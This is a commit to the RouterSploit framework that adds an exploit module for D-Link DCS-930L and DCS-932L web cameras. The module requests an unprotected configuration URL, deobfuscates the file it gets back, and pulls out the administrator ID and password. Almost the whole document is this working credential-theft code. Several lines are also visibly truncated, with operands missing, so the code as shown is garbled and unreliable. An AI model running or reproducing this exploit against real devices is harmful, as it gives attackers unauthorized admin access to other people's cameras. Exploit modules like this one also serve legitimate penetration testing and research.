Commit 97aa58e9 by dincaus

D-Link DCS 930L and 932L authentication bypass by getting configuration of router.

parent ed54a7a7
import re
from routersploit import (
class Exploit(exploits.Exploit):
D-Link DCS web cameras allow unauthenticated attackers to obtain the
configuration of the device remotely. A copy of the device configuration can be
obtained by accessing unprocteted URL.
__info__ = {
'name': 'D-Link DCS Cameras Authentication Bypass',
'description': 'D-Link DCS web cameras allow unauthenticated attackers to obtain the configuration of the device remotely.'
'A copy of the device configuration can be obtained by accessing unprocteted URL.',
'authors': [
'Roberto Paleari', # vulnerability discovery
'references': [
'devices': [
'D-Link DCS-930L, firmware version 1.04',
'D-Link DCS-932L, firmware version 1.02'
target = exploits.Option('', 'Target address e.g.', validators=validators.url) # target address
port = exploits.Option(8080, 'Target port') # default port
config_content = None
def _deobfuscate(self, config):
def chain(lambdas, value):
r_chain = None
for l in lambdas:
r_chain = value = l(value)
return r_chain
arr_c = [chain([
lambda d: ord(d),
lambda d: (d + ord('y')) & 0xff,
lambda d: (d ^ ord('Z')) & 0xff,
lambda d: (d - ord('e')) & 0xff
], t) for t in config]
arr_c_len = len(arr_c)
tmp = ((arr_c[arr_c_len-1] & 7) << 5) & 0xff
for t in reversed(xrange(arr_c_len)):
if t == 0:
ct = chain([
lambda d: (d >> 3) & 0xff,
lambda d: (d + tmp) & 0xff
], arr_c[t])
ct = (((arr_c[t] >> 3) & 0xff) + (((arr_c[t-1] & 0x7) << 5) & 0xff)) & 0xff
arr_c[t] = ct
tmp_str = "".join(map(chr, arr_c))
ret_str = ""
if len(tmp_str) % 2 != 0:
print_error("Config file can't be deobfuscated.")
return None
for i in xrange(len(tmp_str)/2):
ret_str += tmp_str[i+(len(tmp_str)/2)] + tmp_str[i]
return ret_str
def run(self):
if self.check():
print_success("Target appears to be vulnerable")
admin_id = None
admin_password = None
if self.config_content and len(self.config_content):
for line in self.config_content.split("\n"):
line = line.strip()
m_groups = re.match(r'AdminID=(.*)', line, re.I | re.M)
if m_groups:
print_success("Found Admin ID.")
admin_id =
m_groups = re.match(r'AdminPassword=(.*)', line, re.I | re.M)
if m_groups:
print_success("Found Admin password.")
admin_password =
print_table(("AdminId", "Password"), (admin_id, admin_password))
print_error("Exploit failed - target seems to be not vulnerable")
def check(self): # todo: requires improvement
# url = "{}:{}/cgi-bin/export-cgi/images/?category={}&arg0={}".format(, self.port, 'config', 'startup-config.conf')
url = "{}:{}/frame/GetConfig".format(, self.port)
response = http_request(method="GET", url=url)
if response is not None and len(response.content) and response.status_code == 200:
self.config_content = self._deobfuscate(response.content)
return True if self.config_content else False # target is vulnerable
return False # target is not vulnerable
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